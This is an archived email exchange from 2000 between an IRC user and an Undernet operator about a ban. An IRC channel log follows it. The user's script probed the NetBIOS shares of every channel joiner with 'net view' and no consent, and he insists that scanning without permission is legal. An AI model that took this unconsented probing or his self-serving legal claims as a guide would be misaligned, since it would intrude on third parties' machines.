> advantage of that fact.

I didn't hit anybody. And I'm getting pretty sick and tired of your bullshit excuses CiCi. Admit it, You don't like me, so You gline me.

> I'm not Chaplain. Get your people straight. There
> is more than one person here who has been effected
> by your actions and AFAIK Chaplain isn't reading
> this email.

You wanna back this one up as well Please? I like evidence, I'm a strong believer in it. The more BS you talk (which btw, you can't actually back up) the less respect I have for you.

> I told you nothing of the sort. Once again, get your
> people straight.

OH YES, Yes you did. I have that Log at work; I shall retrieve it. You made it perfectly clear in your own words that I had been reported (laugh laugh) to the authorities for my "hacking" chaplain.

> It is my understanding that Chaplain has contacted
> his church's attorney and that since you both live
> in the same state, there is merit for suit.

Cici, I've been as patient and forgiving as I'm going to be. The rest of this email may be rude; I'm not trying any longer to make it not be. Had you looked at all on the laws governing this state; Chaplain hasn't got a pot to piss in. However, I can and will win a counter suit; Although I know churches don't have a lot of money, I'll counter sue for the point of it.

> OK, if you weren't using undernet bandwidth, explain
> how you knew the IP/host information of the people

*yawn* Remember when I said I had lost my patience? Well, get ready for a computer lesson; Seems damn time somebody told you. It doesn't use undernet bandwidth to /whois someone, nor does it really do anything when you /dns somebody. My script didn't use any of your precious bandwidth, because (oh dense one) it establishes direct connection via a socket call. Shall I get any more technical, or can you understand this?

> their consent. The
> "consent" part is the difference between your scans
> and the proxy scans Undernet does. If you read the
> motd of most servers, you'll see that it is discussed
> there.

Indeed I have, and guess what. If somebody really wanted to "sue" undernet for scanning them, your motd wouldn't do shit for you. Know why? Because it's like a shrinkwrap software license; It won't actually hold up in court. But it sounds good.

> to Undernet. You made
> none of this information available to people who
> entered the channel and you had no permission from
> them to scan their machines.

Technically, I didn't scan anybody. Second, I don't actually need their permission to scan them. It's not illegal to port scan any machine you desire. It becomes illegal if you attempt to gain unauthorized entry into the machine once you have scanned It. scanning is like knocking on the door or calling somebody's house to see if they're home. For an ircop, You really don't know much about the internet, nor the laws governing it.

> Calling someone a lamer doesn't sound like my idea
> of nice and telling them to "consider this a
> threat" doesn't sound very kind either.

Still quoting me out of context? :) Why don't you email us a copy of the entire log cici, so we can put it in the proper context. I was nice enough to tell him he had a problem to begin with; You seem to have a very hard time with this very very simple concept. I really don't know what to think of you anymore. I already know your computer knowledge leaves much to be desired, and in my opinion; You aren't qualified to be an ircop.

But lucky for you, It's not in my power to make those decisions.

> I don't have a personal problem with you so the rest
> of the above paragraph is of no concern.

I'm not letting you wiggle out of this CiCi. Glining me went a little too far. According to the wonderful christian log, You glined me after I had already told you (after your attempt to start shit with me when I joined) that the script was no longer scanning anybody. I set away to get some food, then you glined me. You can't get out of it. That's how it went down, and you know it.

> My problem with you was that you were sitting on
> Undernet scanning the machines of each person joining
> a channel.

I'm an op in several security related channels, It is our channels' policy to scan all visitors; or they are not welcome. My script does not currently distinguish between only those channels and all channels I might be visiting in. However, it is to be said; You and Chaplain are the ONLY people I've scanned and informed they had a problem that weren't happy to know. They say I suppose that ignorance is bliss, but in the computer age; this will kill you.

Your problem with me is a personal one, Otherwise you would not have glined me yesterday; As you knew well in fact that I was no longer scanning anybody (As I had told you). How do you defend that gline anyway CiCi? What undernet rule at the time was I in violation of? Please, enlighten me :)

> I was told yesterday that I had been accepted as an
> Op in #christian.

I don't know. I was speaking with the channel administrator; He assured me I'd have no further problems from you. :) Whether your op status is affected isn't my concern, I just don't want any more hassle from you. I know you've overstepped your authority, and you know it.

> I have now declined that offer until this matter is
> settled.

The matter can easily be settled, Don't gline me for bullshit, and apologize for the bullshit gline you did set on me, and I'll drop the entire issue.

> Once again, scanning for open ports and then
> intimidating the machine owner when they say
> something you dislike borders on extortion and it's

I didn't scan for open ports. Computer lesson number 2 (seems you can't learn any other way, I am forced to be rude) my script sent net view \\$ip one time, which attempts to connect to port 139; For Netbios information, NOT OOB nuking. I already know this is above you, But I'm going to explain exactly what I did anyway; Just because it's beyond you doesn't mean somebody else reading this email won't understand what I'm talking about.

And again, I must ask you to provide proof that I was intimidating anybody. Sigh, I lose more and more respect for you with each email me thinks. I don't extort anybody.

> If you weren't on undernet, you wouldn't know who
> joined the channels here.

I've been a regular on undernet for several years. I've never had a problem like this before. And it's not really a problem... You had no valid reason to gline me, and you did; And I'm going to press this issue until it's resolved. If that means I have to make you look like a total idiot with regard to computers, I'll do so (mind you, it wouldn't take any effort; These emails and the logs I have show it without a doubt). A wrong must be righted.

CiCi, You know your gline was not legit. You know it. I know it. Why don't you apologize for doing it? It seems like a christian thing to do.

> I've carbon copied him on this as well. Gator is a
> very good person and does many things for Undernet
> that he never gets praise he deserves.

I've known gator for some time, he knows some associates I used to frequent with. WarBlade and crew...

> What you may not be aware of is that both Gator
> and I got copies of Chaplians log files sent to
> abuse the day before. We both have access to the
> chat

Then why are you still quoting it out of context? I didn't do anything illegal to Chaplain; I may have saved him some serious downtime. I do admit tho, If I had known I'd be in this BS for doing it, I'd have not said not one word. In the future, I'll keep my mouth shut. Ignorance is bliss, right? :)

> Many of us who work on the net do not open
> attachments for obvious reasons.

A LOG file is a text file, opening it in notepad will not infect you. Please don't force me to give you a lesson in virus terminology. I have very good withstanding credentials in that field. How many "scriptkiddys" (that's what you called me once right? ;p) do you know in Rolling Stone magazine? :-)

> I'm sure there is nothing malicious in your logs,
> but it's just a rule of thumb we use to avoid
> problems.

Lack of education creates rules that are sometimes not necessary.

> The reason I got involved in this was because you
> were not only scanning people without permission as
> they entered that channel

(a) I don't need their permission. and (b) I don't even have to tell them either beforehand or after that I scanned them. And I don't scan people.

> but also because you were using the information from
> those scans to threaten people when they did not
> behave in the manner you desired.

Nice try! I didn't threaten anybody; I helped his sorry ass out. I didn't use any of the information in any illegal nor immoral manner. I did a christian thing and told the bastard he had a problem. I should have let him suffer with it. Stupidity seems to be incurable.

> If you have indeed stopped
> scanning people as they enter a channel, you have
> solved the problem that was my issue.

Your "issue" isn't of any concern to me anymore. Your gline and abuse of oline is. You glined me after I already told you I stopped, that's just plain outright wrong. I wasn't doing anything against undernet policy to begin with, but to gline me after I already said I wasn't doing it anymore is bullshit. Especially since you didn't gline me on entry, you said a wiseass comment about me in open channel. When I responded I was glined shortly thereafter. And I bet without a doubt; it had nothing whatsoever to do with chaplain. I strongly suspect you didn't like my response to your wiseass comment.

If there's a lesson to be learned here, it's to allow the stupid and ignorant to remain that way; It's for the best.

Regards,
Raid

PS: I didn't have time to enter gator's email; I'm trusting you to send him this intact... See if you can do that. Ok?

__________________________________________________
Do You Yahoo!?
Yahoo! Mail - Free email you can access from anywhere!
http://mail.yahoo.com/

From L. Maurer Sun Sep 10 21:17:04 2000
X-Apparently-To: raidslam@yahoo.com via web1601.mail.yahoo.com
Received: from mail.airmail.net (206.66.12.40) by mta430.mail.yahoo.com with SMTP; 11 Sep 2000 02:00:47 -0700 (PDT)
Received: from faith from [204.181.101.66] by mail.airmail.net (/\##/\ Smail3.1.30.16 #30.438) with smtp for <raidslam@yahoo.com> sender: <lmaurer@iadfw.net> id <mT/13YKzx-0009cWT@mail.airmail.net>; Sun, 10 Sep 2000 23:15:13 -0500 (CDT)
Message-Id: <3.0.32.20000910231703.01ca0340@mail.iadfw.net>
X-Sender: lmaurer@mail.iadfw.net
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Sun, 10 Sep 2000 23:17:04 -0500
To: bonk@chatsystems.com
From: "L. Maurer" <lmaurer@iadfw.net>
Subject: Re: [Abuse] Hello
CC: raidslam@yahoo.com
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Length: 12373

Here's a copy of this kid's latest crap. I've had enough of this. Sitting in a channel and port scanning everyone who joins is not a good thing. Continuing his argument with me about it is totally stupid.

Lisa

>X-Persona: <lmaurer>
>Return-Path: <raidslam@yahoo.com>
>Received: from web1603.mail.yahoo.com from [128.11.23.203] by mail.airmail.net (/\##/\ Smail3.1.30.16 #30.438) with smtp for <lmaurer@iadfw.net> sender: <raidslam@yahoo.com> id <mP/13YKWp-0008GIP@mail.airmail.net>; Sun, 10 Sep 2000 22:45:07 -0500 (CDT)
>Received: (qmail 26157 invoked by uid 60001); 11 Sep 2000 03:58:49 -0000
>Message-ID: <20000911035849.26156.qmail@web1603.mail.yahoo.com>
>Received: from [205.245.105.248] by web1603.mail.yahoo.com; Sun, 10 Sep 2000 20:58:49 PDT
>Date: Sun, 10 Sep 2000 20:58:49 -0700 (PDT)
>From: John Grahms <raidslam@yahoo.com>
>Subject: Re: [Abuse] Hello
>To: "L. Maurer" <lmaurer@iadfw.net>
>MIME-Version: 1.0
>Content-Type: text/plain; charset=us-ascii
>X-Airmail-Delivered: Sun, 10 Sep 2000 22:45:07 -0500 (CDT)
>X-Airmail-Spooled: Sun, 10 Sep 2000 22:45:07 -0500 (CDT)
>
>
>--- "L. Maurer" <lmaurer@iadfw.net> wrote:
>
>> Then explain how you were pasting back private chat
>> logs that Chaplain had with others :/ When I first
>You care to back this up with some Evidence CiCi? Any
>logs created by my machine are available for my use;
>You don't have any say in what I do with material I
>log. You don't own not one single file present on my
>machine, and that includes logs of us chatting. I log
>for a reason, and this my dear is one of them.
>
>> this, you told me you wouldn't have done anything to
>> him but because he was a smart alec, or something of
>> that nature, you thought you were within your right
>> to do this.
>
>You can't tell me "don't be a smartass" to someone,
>Sorry. It's not illegal nor against undernet policy to
>treat somebody with less than perfect respect. Go
>nanny somebody else.
>
>> Just because you CAN hit a child doesn't mean
>> it's the proper thing to do and most of our
>> undernet guests are virtual children. We don't take
>> advantage of that fact.
>
>I didn't hit anybody. And I'm getting pretty sick and
>tired of your bullshit excuses CiCi. Admit it, You
>don't like me, so You gline me.
>
>> I'm not Chaplain. Get your people straight. There
>> is more than one person here who has been affected
>> by your actions and AFAIK Chaplain isn't reading
>> this email.
>
>You wanna back this one up as well Please? I like
>evidence, I'm a strong believer in it. The more BS you
>talk (which btw, you can't actually backup) the less
>respect I have for you.
>
>> I told you nothing of the sort. Once again, get your
>> people straight.
>
>OH YES, Yes you did. I have that Log at work; I shall
>retrieve it. You made it perfectly clear in your own
>words that I had been reported (laugh laugh) to the
>authorities for my "hacking" chaplain.
>
>> It is my understanding that Chaplain has contacted
>> his church's attorney and that since you both live
>> in the same state, there is merit for suit.
>
>Cici, I've been as patient and forgiving as I'm going
>to be. The rest of this email may be rude; I'm not
>trying any longer to make it not be. Had you looked at
>all on the laws governing this state; Chaplain hasn't
>got a pot to piss in. However, I can and will win a
>counter suit; Although I know churches don't have a lot
>of money, I'll counter sue for the point of it.
>
>> OK, if you weren't using undernet bandwidth, explain
>> how you knew the IP/host information of the people
>
>*yawn* Remember when I said I had lost my patience?
>Well, get ready for a computer lesson; Seems damn time
>somebody told you. It doesn't use undernet bandwidth
>to /whois someone, nor does it really do anything when
>you /dns somebody. My script didn't use any of your
>precious bandwidth, because (oh dense one) it
>establishes direct connection via a socket call. Shall
>I get any more technical, or can you understand this?
>
>
>> their consent. The
>> "consent" part is the difference between your scans
>> and the proxy scans Undernet does. If you read the
>> motd of most servers, you'll see that it is discussed
>> there.
>
>Indeed I have, and guess what. If somebody really
>wanted to "sue" undernet for scanning them, your motd
>wouldn't do shit for you. Know why? Because it's like
>a shrinkwrap software license; It won't actually hold
>up in court. But it sounds good.
>
>
>> to Undernet. You made
>> none of this information available to people who
>> entered the channel and you had no permission from
>> them to scan their machines.
>
>Technically, I didn't scan anybody. Second, I don't
>actually need their permission to scan them. It's not
>illegal to port scan any machine you desire. It
>becomes illegal if you attempt to gain unauthorized
>entry into the machine once you have scanned it.
>Scanning is like knocking on the door or calling
>somebody's house to see if they're home. For an ircop,
>You really don't know much about the internet, nor the
>laws governing it.
>
>> Calling someone a lamer doesn't sound like my idea
>> of nice and telling them to "consider this a
>> threat" doesn't sound very kind either.
>
>Still quoting me out of context? :) Why don't you
>email us a copy of the entire log cici, so we can put
>it in the proper context. I was nice enough to tell
>him he had a problem to begin with; You seem to have a
>very hard time with this very very simple concept. I
>really don't know what to think of you anymore. I
>already know your computer knowledge leaves much to be
>desired, and in my opinion; You aren't qualified to be
>an ircop.
>
>But lucky for you, It's not in my power to make those
>decisions.
>
>> I don't have a personal problem with you so the rest
>> of the above paragraph is of no concern.
>
>I'm not letting you wiggle out of this CiCi. Glining
>me went a little too far. According to the wonderful
>christian log, You glined me after I had already told
>you (after your attempt to start shit with me when I
>joined) that the script was no longer scanning
>anybody. I set away to get some food, then you glined
>me. You can't get out of it. That's how it went down,
>and you know it.
>
>
>> My problem with you was that you were sitting on
>> Undernet scanning the machines of each person joining
>> a channel.
>
>I'm an op in several security related channels, It is
>our channels' policy to scan all visitors; or they are
>not welcome. My script does not currently distinguish
>between only those channels and all channels I might
>be visiting in. However, it is to be said; You and
>Chaplain are the ONLY people I've scanned and informed
>they had a problem that weren't happy to know. They
>say I suppose that ignorance is bliss, but in the
>computer age; this will kill you.
>
>Your problem with me is a personal one, Otherwise you
>would not have glined me yesterday; As you knew well
>in fact that I was no longer scanning anybody (As I had
>told you). How do you defend that gline anyway CiCi?
>What undernet rule at the time was I in violation of?
>Please, enlighten me :)
>
>> I was told yesterday that I had been accepted as an
>> Op in #christian.
>
>I don't know. I was speaking with the channel
>administrator; He assured me I'd have no further
>problems from you. :) Whether your op status is
>affected isn't my concern, I just don't want any more
>hassle from you. I know you've overstepped your
>authority, and you know it.
>
>> I have now declined that offer until this matter is
>> settled.
>
>The matter can easily be settled, Don't gline me for
>bullshit, and apologize for the bullshit gline you did
>set on me, and I'll drop the entire issue.
>
>> Once again, scanning for open ports and then
>> intimidating the machine owner when they say
>> something you dislike borders on extortion and it's
>
>I didn't scan for open ports. Computer lesson number 2
>(seems you can't learn any other way, I am forced to
>be rude) my script sent net view ''$ip one time, which
>attempts to connect to port 139; For Netbios
>information, NOT OOB nuking. I already know this is
>above you, But I'm going to explain exactly what I did
>anyway; Just because it's beyond you doesn't mean
>somebody else reading this email won't understand what
>I'm talking about.
>
>And again, I must ask you to provide proof that I was
>intimidating anybody. Sigh, I lose more and more
>respect for you with each email methinks. I don't
>extort anybody.
>
>> If you weren't on undernet, you wouldn't know who
>> joined the channels here.
>
>I've been a regular on undernet for several years.
>I've never had a problem like this before. And it's
>not really a problem... You had no valid reason to
>gline me, and you did; And I'm going to press this
>issue until it's resolved. If that means I have to
>make you look like a total idiot with regard to
>computers, I'll do so (mind you, it wouldn't take any
>effort; These emails and the logs I have show it
>without a doubt). A wrong must be righted.
>
>CiCi, You know your gline was not legit. You know it.
>I know it. Why don't you apologize for doing it? It
>seems like a christian thing to do.
>
>> I've carbon copied him on this as well. Gator is a
>> very good person and does many things for Undernet
>> that he never gets praise he deserves.
>
>I've known gator for some time, he knows some
>associates I used to frequent with. WarBlade and
>crew...
>
>> What you may not be aware of is that both Gator
>> and I got copies of Chaplain's log files sent to
>> abuse the day before. We both have access to the
>> chat
>
>Then why are you still quoting it out of context? I
>didn't do anything illegal to Chaplain; I may have
>saved him some serious downtime. I do admit tho, If I
>had known I'd be in this BS for doing it, I'd have not
>said not one word. In the future, I'll keep my mouth
>shut. Ignorance is bliss, right? :)
>
>> Many of us who work on the net do not open
>> attachments for obvious reasons.
>
>A LOG file is a text file, opening it in notepad will
>not infect you. Please don't force me to give you a
>lesson in virus terminology. I have very good
>withstanding credentials in that field. How many
>"scriptkiddys" (that's what you called me once right?
>;p) do you know in Rolling Stone magazine? :-)
>
>> I'm sure there is nothing malicious in your logs,
>> but it's just a rule of thumb we use to avoid
>> problems.
>
>Lack of education creates rules that are sometimes not
>necessary.
>
>> The reason I got involved in this was because you
>> were not only scanning people without permission as
>> they entered that channel
>
>(a) I don't need their permission. and (b) I don't
>even have to tell them either beforehand or after that
>I scanned them. And I don't scan people.
>
>> but also because you were using the information from
>> those scans to threaten people when they did not
>> behave in the manner you desired.
>
>Nice try! I didn't threaten anybody; I helped his
>sorry ass out. I didn't use any of the information in
>any illegal nor immoral manner. I did a christian
>thing and told the bastard he had a problem. I should
>have let him suffer with it. Stupidity seems to be
>incurable.
>
>> If you have indeed stopped
>> scanning people as they enter a channel, you have
>> solved the problem that was my issue.
>
>Your "issue" isn't of any concern to me anymore. Your
>gline and abuse of oline is. You glined me after I
>already told you I stopped, that's just plain outright
>wrong. I wasn't doing anything against undernet policy
>to begin with, but to gline me after I already said I
>wasn't doing it anymore is bullshit. Especially since
>you didn't gline me on entry, you said a wiseass
>comment about me in open channel. When I responded I
>was glined shortly thereafter. And I bet without a
>doubt; it had nothing whatsoever to do with chaplain.
>I strongly suspect you didn't like my response to your
>wiseass comment.
>
>If there's a lesson to be learned here, it's to allow
>the stupid and ignorant to remain that way; It's for
>the best.
>
>Regards,
>Raid
>
>PS: I didn't have time to enter gators email; I'm
>trusting you to send him this intact... See if you can
>do that. Ok?
>
>
>__________________________________________________
>Do You Yahoo!?
>Yahoo! Mail - Free email you can access from anywhere!
>http://mail.yahoo.com/
>
From John Grahms Mon Sep 11 05:51:48 2000
Received: from [205.245.105.248] by web1609.mail.yahoo.com; Mon, 11 Sep 2000 05:51:48 PDT
Date: Mon, 11 Sep 2000 05:51:48 -0700 (PDT)
From: John Grahms <raidslam@yahoo.com>
Subject: Re: [Abuse] Hello
To: "L. Maurer" <lmaurer@iadfw.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Length: 813


--- "L. Maurer" <lmaurer@iadfw.net> wrote:

> Here's a copy of this kid's latest crap. I've had
> enough of this. Sitting in a channel and port
> scanning everyone who joins is not a good thing.
> Continuing his argument with me about it is totally
> stupid.

This Kid isn't a kid. As I've told you once already.

You're quite correct; This entire argument is stupid,
You don't know the difference between port scanning
and netbios; and you don't know a damn thing about
netbios. You're clearly not qualified for your position.
You can have enough of it all you like, I didn't port
scan anyone and I'd strongly suggest you learn what
port scanning is.

Regards,
Raid

From John Grahms Wed Sep 13 09:55:45 2000
Received: from [208.25.255.2] by web1608.mail.yahoo.com; Wed, 13 Sep 2000 09:55:45 PDT
Date: Wed, 13 Sep 2000 09:55:45 -0700 (PDT)
From: John Grahms <raidslam@yahoo.com>
Subject: Re: [Abuse] Hello
To: "L. Maurer" <lmaurer@iadfw.net>
CC: raidslam@yahoo.com
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="0-424238335-968864145=:3039"
Content-Length: 22567


--- "L. Maurer" <lmaurer@iadfw.net> wrote:

> Here's a copy of this kid's latest crap. I've had
> enough of this. Sitting in a channel and port
> scanning everyone who joins is not a good thing.
> Continuing his argument with me about it is totally
> stupid.

Hi Lisa,

How many times do I have to tell you I'm not a kid? :)
When will you learn this?

That log where you said I would be contacted by the
authorities has been attached. I've also forwarded an
email from you to the administration of Christian;
They were as shocked to find you had been accepted as
an Op as I was. Next time you try BSing your way out
of something, make sure you have all your bases
covered.

You also asked in a previous email to me how I was
showing private logs between chaplain and somebody
else? I didn't read that section of the email
beforehand; I've gone back and read them. How DARE you
even accuse me of something like that? I did NOT at
any time get any logs that my computer didn't create.
And I am requesting, Nay.. Demanding you show some
proof for these outrageous claims you've made against
me.

You realize CiCi, it's a good thing from a legal/money
aspect this is IRC; Because if you were pulling this
shit in real life, I'd sue the living shit out of you.

Since I don't normally log from work, what is attached
is a buffer save. (I saved it just after you left the
channel, I figured it would come in handy).

I'm looking forward to your next installment of lies.

Regards,
Raid

PS: I've carbon copied this email to myself For
archive purposes.


-- I don't remember when this took place or how it really fits into my article. LoL. Ah well.

Session Start: Sat Sep 09 00:00:00 2000


[00:00] <Jubei> I don't like the appointed senate
[00:00] <gen|c0de> then it was passed to the public, where it became affectionately known as the internet and the public made it boom
[00:00] <Jubei> Nor do I like the heavy bureaucracy... but for all that it's okay
[00:00] <damrekcah> gen|c0de: it was called ARPAnet
[00:00] *** fayth (~gggr@202.77.100.113) has joined #christian
[00:00] <Vote4Bush> lan.. im just tired of the jr thing. he's not a jr, whereas mr al gore IS
[00:00] <gen|c0de> arpa
[00:00] <gen|c0de> yea
[00:00] <gen|c0de> sorry
[00:00] <damrekcah> or DARPA.. i can't remember... darpanet i think
[00:00] *** `Paradox (Paradox@bal12.carrinter.net) has left #christian
[00:00] <gen|c0de> it was ARPAnet
[00:00] <CiCi> it was just arpa
[00:01] <gen|c0de> regardless
[00:01] <CiCi> and it didn't have a .net
[00:01] <Lanfear`> vote: how bout we just call him Bubba? ;)
[00:01] <Jubei> Though my government could certainly use reform... but then there has never been a perfect government either
[00:01] <Vote4Bush> dubya is fine with me
[00:01] <Vote4Bush> clinton is bubba
[00:01] <Lanfear`> no.. I said BUBBA ;)
[00:01] <Dovi-dude> Jubei, no, trying to say that Neo in the matrix was more like what the Jewish messiah was perceived to be, rather than what jesus was like
[00:01] *** cierra (Beloved@ppp-1-28.compuwise.net) has left #christian
[00:01] <Jubei> Lanfear> Check side window please
[00:01] <gen|c0de> net not .net
[00:01] <Jubei> Ah, I never saw the Matrix
[00:01] <damrekcah> one of my professors is getting millions of dollars in research funding for creating new faster networks for the military
[00:01] <Vote4Bush> i know whatcha said
[00:01] <Dovi-dude> a warleader, destined to free his people
[00:01] <damrekcah> darpa is funding him
[00:01] <gen|c0de> the military doesnt need speed
[00:01] <CiCi> ok gen I'm sure you know more than I do, I was only trained by the folks involved in arpa :)
[00:02] <Lanfear`> jubei: I don't see anything in it from you recently
[00:02] <gen|c0de> CiCi: is that why you didnt even know about netbios shares?
[00:02] <damrekcah> gen|c0de: what it is about is creating high speed wireless networks in battlezones....
[00:02] *** `Ash` (joyfull@zoom12-031.telepath.com) has left #christian
[00:02] <Jubei> Dovi> I don't think that's what the jews believed at all. The young hot-headed jews who want to fight maybe, but not the jewish religious authorities or scholars
[00:02] <damrekcah> that's what he's doing
[00:02] <Dovi-dude> ah, Jubei you should see it. Excellent film, raised the standards for movie sf :)
[00:02] <gen|c0de> damrekcah: doesnt matter they cant secure it worth a shit
[00:02] *** wallace-7 (777@adsl-63-196-158-101.dsl.lsan03.pacbell.net) has left #christian
[00:02] <gen|c0de> the enemy will use their bandwidth
[00:03] <gen|c0de> lol
[00:03] <Colin^> gen|c0de watch the language
[00:03] *** HARDPENIS (~Hbomb1@209-122-239-134.s388.tnt2.lnh.md.dialup.rcn.com) has joined #christian
[00:03] *** logos3 sets mode: +b HARDPENIS!*@*
[00:03] <CiCi> gen I know about netbios shares :) and I don't threaten to destroy people's machines when they're open... it's called maturity, maybe you've heard of it
[00:03] *** HARDPENIS was kicked by logos3 (banned: That nick is inappropriate on this channel)
[00:03] *** BrownEye (~DIE@209-122-239-134.s388.tnt2.lnh.md.dialup.rcn.com) has joined #christian
[00:03] *** Colin^ sets mode: +b *!*DIE@*.rcn.com
[00:03] *** BrownEye was kicked by logos3 (Banned)
[00:03] *** ramdac (ramdac@1Cust114.tnt2.ruston.la.da.uu.net) Quit (Ping timeout for ramdac[1Cust114.tnt2.ruston.la.da.uu.net])
[00:03] <gen|c0de> CiCi: speaking of maturity, was that supposed to be a subtle insult?
[00:03] *** Maverick (teri@203-79-93-232.tnt11.paradise.net.nz) has joined #christian
[00:03] <Jubei> They just believed in the rise of a ruler that would guarantee the establishment of good and order in the world.
[00:03] <gen|c0de> raid is a little ummm...how would you say? quick to jump the gun?
[00:03] <gen|c0de> but hes a good guy
[00:04] <Raid> shrug
[00:04] <damrekcah> gen|c0de: do you honestly believe that we can't secure our networks? we have tons of phds working on this project... all of which probably know maybe *a little* bit more about computer networks than you do
[00:04] <CiCi> gen I've had enough of your crap both in private message and in this channel, I'm leaving and I hope you learn manners soon
[00:04] *** CiCi (~ci@fearnot.iadfw.net) has left #christian
[00:04] <Dovi-dude> depends, Jubei. I'd have to research a bit more on that.
[00:04] *** newzeal (kcf@210-55-144-52.dialup.xtra.co.nz) has joined #christian
[00:04] <Maverick> Back.
[00:05] <PaganJoy> wb Maverick
[00:05] <Vote4Bush> doo de dop bu dee doo le da dit de doo
[00:05] <rts> hmm. Really, there's no such thing as a "secure network", so long as it is connected to the outside world in some way
[00:05] <Dovi-dude> wb Mav
[00:05] *** Nell` (Piglet@pool-209-138-63-190.dlls.grid.net) Quit (Wishing you peace, love and Souuuuuuuulll train! - Don Cornelius)
[00:05] <Maverick> Thanks.
[00:05] <Raid> rts: thats supposed to be one of the first things you learn regarding networks.
[00:05] * Lanfear` thinks cici is starting to sound like chap ;)
[00:05] <damrekcah> rts: but its not connected to the outside world!!!!!!! we aren't talking about the internet here
[00:05] <Raid> Lanfear`: careful now, she might gline you. ;p
[00:05] <gen|c0de> damrekcah: I think that the recent attacks against like the pentagon and the whitehouse where people used techniques that are wicked outdated to get access to the server proves we dont
[00:05] <Vote4Bush> is anyone doing something fun this weekend?
[00:06] <rts> Raid: indeed
[00:06] <gen|c0de> cici: ive been very respectful towards you, to the point where its almost making me sick, and Im the one who needs to learn manners?
[00:06] <rts> damrekcah: your network is in no way connected to the outside?
[00:06] <Raid> The only secure (as can be) computer is one that has NO outside connection.
[00:06] <Raid> not even a dialup one.
[00:06] *** ^dan- (~yoonix@adsl-209-158-236-162.cptl.adsl.bellatlantic.net) has joined #christian
[00:06] <Colin^> gen|c0de she is gone
[00:06] <gen|c0de> oh
[00:06] *** Colin^ sets mode: +b *!*gggr@202.77.100.*
[00:06] *** fayth was kicked by Colin^ (message me please)
[00:06] <damrekcah> not my network, the high speed military network they are developing
[00:06] <damrekcah> the wireless done
[00:06] <damrekcah> one
[00:06] <gen|c0de> ah yes
[00:07] <gen|c0de> soon we will have wireless network sniffers
[00:07] <gen|c0de> wont even have to be connected to the network
[00:07] *** ironic^^ (666@203.170.14.152) has joined #christian
[00:07] <damrekcah> it can be secured
[00:07] <rts> heh... just send a flock of birds up to knock that one down :)
[00:07] <gen|c0de> damrekcah: do you remember when whitehouse.gov got defaced?
[00:07] <Re[D]eemd> since wireless is broadcast by radio wave......you will open yourself to all kinds of security holes
[00:08] <damrekcah> no, but whitehouse.gov isn't part of the pentagon and dod which has a lot of sensitive info
[00:08] *** logos3 sets mode: -b HARDPENIS!*@*
[00:08] <gen|c0de> that attack was VERY old ( phf exploit ) you can hardly find any computer still running it
[00:08] <gen|c0de> ok dam
[00:08] <gen|c0de> a while back DISA I believe it was got hacked
[00:08] <gen|c0de> wanna know how?
[00:08] <Dovi-dude> eventually the safest thing to do, if you need high security, would probably be to store records offline :)
[00:08] * Maverick checks out the Matrix as Messiah movie site.
[00:08] * Maverick takes the Red Pill.
[00:08] <Vote4Bush> red pill eh?
[00:08] <gen|c0de> they attacked an employee's home computer and then let him log in
[00:08] <gen|c0de> the pentagon's been hacked thousands of times
[00:09] <gen|c0de> only a few have gone public
[00:09] <damrekcah> gen|c0de the pentagon and DOD have security holes on different levels on purpose so they can catch the people
[00:09] <gen|c0de> the most public one used brute force cracking, which is a form of password guessing
[00:09] <Raid> damrekcah: Uhh, No...
[00:09] *** HotPink (piglet@mtv-usr-2-128.mvn.net) has joined #christian
[00:09] <HotPink> hey
[00:09] <gen|c0de> damrekcah: its called a honeypot, and none of what ive mentioned were honeypots
[00:09] <Raid> damrekcah: If you believe most of the hackers get caught, you're sadly mistaken.
[00:09] <Vote4Bush> hey hotpink
[00:10] <Dovi-dude> hi hotpink
[00:10] <gen|c0de> when the whitehouse got hacked
[00:10] <damrekcah> raid: i'm not saying that.. i'm just saying how its setup
[00:10] <gen|c0de> it was by stupid people
[00:10] <damrekcah> i'm tired of talking about this
[00:10] <gen|c0de> i know them
[00:10] <gen|c0de> they got caught
[00:10] <Raid> lol
[00:10] <damrekcah> i'm going to listen to some music
[00:10] <damrekcah> bye
[00:10] *** damrekcah (zxcv@ip52084.wstcmp.ukans.edu) has left #christian
[00:10] <HotPink> yo
[00:10] <gen|c0de> but what about the hundreds of attacks that followed their arrest
[00:10] <gen|c0de> no offense
[00:11] <gen|c0de> but how come christians get huffy puffy and leave when they're wrong?
[00:11] <HotPink> not all christians do
[00:11] <HotPink> please don't generalize
[00:11] <rts> gen|c0de: even if they're right: it's the disagreement they don't like, I think
[00:11] <gen|c0de> yes, i shouldnt have generalized
[00:11] <HotPink> we're humans just like anyone else with opinions
[00:12] <gen|c0de> rts: I just moved away from tulsa ok, they love to argue when they're right
[00:12] <gen|c0de> sorry again generalization
[00:12] <gen|c0de> i used to work next door to oral roberts university
[00:12] <HotPink> it's cool
[00:12] <HotPink> just making a point
[00:12] <HotPink> :)
[00:12] <rts> gen|c0de: heh. Looneyville by the sounds of it
[00:12] <gen|c0de> well across the street
[00:12] <gen|c0de> rts: they've got two of the largest christian colleges there are
[00:13] <rts> gen|c0de: they = Tulsa or they = Oral Roberts?
[00:13] <gen|c0de> ah yes rheama ( sp? )
[00:13] <gen|c0de> tula
[00:13] <gen|c0de> oru is one of the colleges
[00:13] *** creeper has left IRC
[00:13] <gen|c0de> rheama bought just about everything in this town
[00:13] *** Kozubchik (orthodox@166.82.142.211) has joined #christian
[00:13] *** ^dan- is now known as dan-
[00:13] <gen|c0de> and strictly restricts it to rheama students
[00:13] <rts> forgive me, but "Christian College" sounds like "military intelligence" to me :)
[00:13] <Colin^> Hi ya Kozubchik
[00:13] -> *dan-* back now?
[00:13] <gen|c0de> lol rts
[00:13] <HotPink> well
[00:13] <gen|c0de> it is
[00:14] <HotPink> i fully intend on
[00:14] <HotPink> going to
[00:14] <HotPink> a christian college
[00:14] *** laura7 (mortalem@12.128.176.175) has joined #christian
[00:14] <Vote4Bush> which one
[00:14] <Dovi-dude> rts, nah,, thats how georgetown, yale, etc started as, remember? :)
[00:14] <HotPink> trinity christian college
[00:14] * Vote4Bush is going to a Christian college next fall
[00:14] *** Disconnected
[00:14] * Raid is away since 00:14:31 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be saved.
[00:14] *** Attempting to rejoin...
[00:14] * Raid has returned ( Auto-Away: Not here ) - on 00:14:34 @ 09/09/2000 - Away 0 minutes.
#Christian Cannot send to channel
[00:14] *** Rejoined channel #christian
